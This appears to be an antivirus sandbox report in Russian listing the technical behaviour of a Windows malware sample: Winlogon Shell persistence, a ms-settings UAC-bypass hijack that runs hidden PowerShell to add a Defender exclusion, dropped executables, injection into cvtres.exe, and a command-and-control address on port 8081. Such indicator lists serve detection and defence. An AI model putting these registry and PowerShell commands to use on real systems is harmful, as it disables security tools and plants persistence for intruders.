Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, %LOCALAPPDATA%\hDesk\hDesk.exe'
- [<HKCU>\Software\Classes\ms-settings\shell\open\command] '' = 'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\hDe...
- %WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe
- %TEMP%\build.exe
- %LOCALAPPDATA%\hdesk\hdesk.exe
- %APPDATA%\temp0923
- '89.##8.103.191':8081
- 'ip##fo.io':80
- http://ip##fo.io/ip
- '89.##8.103.191':8081
- DNS ASK ip##fo.io
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Proxy Desktop' WindowName: ''
- ClassName: 'SystemTray_Main' WindowName: ''
- ClassName: 'Media Center Tray Applet' WindowName: ''
- ClassName: '' WindowName: 'View Available Networks'
- ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: 'BluetoothNotificationAreaIconWindowClass'
- ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: ''
- '%TEMP%\build.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' installs_COBA 89.208.103.191 8081 ehljcYHFU' (со скрытым окном)
- '%WINDIR%\explorer.exe'
- '<SYSTEM32>\ctfmon.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' installs_COBA 89.208.103.191 8081 ehljcYHFU
- '%WINDIR%\syswow64\computerdefaults.exe'